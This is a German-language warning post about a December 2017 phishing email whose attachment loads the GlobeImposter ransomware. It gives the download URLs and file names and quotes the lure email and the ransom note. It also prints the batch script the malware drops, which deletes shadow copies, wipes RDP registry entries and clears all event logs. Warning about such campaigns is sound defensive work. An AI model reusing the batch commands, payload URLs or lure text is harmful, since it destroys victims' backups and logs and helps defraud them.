CC Confirmation von Samual Trappit ([email protected]) bringt die Ransomware ‚GlobeImposter‘ und verschlüsselt nach *.doc

Am Montag, den 04. Dezember 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in englischer Sprache versendet. Öffnen Sie nicht die Anlage! Das .7z-Archiv enthält ein .vbs-Script, welches die Ransomware „GlobeImposter“ (Verschlüsselungs- und Epressungstrojaner) nachlädt.

Betreff: CC Confirmation
Absender: Samual Trappit ([email protected])

Hi:

Attached is confirmation of your credit card payment per your requested.

Please advise if you should have any questions & I would be happy to help.

Samual Trappit

Achtung: Es handelt sich um eine betrügerische E-Mail! Öffnen Sie nicht die Anlage! Die E-Mail kommt mit unterschiedlichen Absendernamen.

Die E-Mail bringt ein .7z – Archiv mit, welches ein .vbs-Script enthält:

SKM_C554e32007198731.7z
SKM_C554e69342756505.7z
SKM_C554e16073234941.vbs
SKM_C554e16084941158.vbs

Öffnen Sie nicht das .7z – Archiv und führen Sie das Script nicht aus!

Das Script würde so beginnen:

 

Von der Internetadresse

  • gulercin.com/JH67RdfgD?
  • arcusautomatika.ba/JH67RdfgD?

wird eine ausführbare Datei nachgeladen:

McTAfmt.exe
vLNJWzDotXc.exe

Es handelt sich um den Verschlüsselungs- und Erpressungstrojaner „GlobeImposter“ (Ransomware). Virustotal zeigt eine Erkennungsrate von 13/67.

Neben der .exe-Datei wird ein MS-DOS-Fenster geöffnet:

 

Die Ransomware beginnt sofort damit, alle wichtigen Dateien in *.doc umzubenennen:

 

Daneben produziert „GlobeImposer“ eine Datei, die auf die Verschlüsselung hinweist:

Read___ME.html

 

Auf dem Desktop sind selbst die Links verschlüsselt:

 

Außerdem legt der Trojaner noch eine Batch-Datei an:

@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default“ /va /f
reg delete „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers“ /f
reg add „HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers“
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F „tokens=*“ %1 in (‚wevtutil.exe el‘) DO wevtutil.exe cl „%1“

 

Die „Read___ME.html“ zeigt folgenden Inhalt:

Your files are Encrypted!

For data recovery needs decryptor.

If you want to buy a decryptor click „Buy Decryptor“

Buy Decryptor

If not working, click again.

Free decryption as guarantee.
Before paying you can send us 1 file for free decryption.
To send a message or file use this link.
Support

If you can not contact, follow these two steps:
1. Install the TOP Browser from this link: torproject.org
2. Open this link in the TOP browser: http://n224ezvhg4sgyamb.onion/sup.php

 

Die Seite „Buy Decryptor“ würde folgende Erpessung zeigen:

To buy the decryptor, you must pay the cost of: 0.09 Bitcoin ($ 1000)
You have 2 days for payment
time left :

after finishing offer, decryptor cost will be 0.18 Bitcoin

You can buy bitcoin on one of these sites:
blockchain.info
localbitcoins.com
google.com

send 0.09 bicoin on the Bitcoin address: ***************
After payment enter your REAL e-mail to get the decryptor

E-MAIL

SUBMIT E-MAIL

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert